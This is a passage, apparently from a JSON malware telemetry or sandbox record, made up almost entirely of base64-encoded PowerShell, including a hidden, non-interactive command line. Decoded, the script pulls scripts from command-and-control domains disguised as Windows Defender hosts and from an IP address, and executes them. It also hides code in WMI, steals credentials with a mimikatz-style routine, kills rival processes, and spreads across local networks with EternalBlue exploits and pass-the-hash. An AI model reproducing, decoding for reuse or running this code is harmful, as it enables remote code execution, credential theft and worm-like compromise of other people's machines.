G4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8A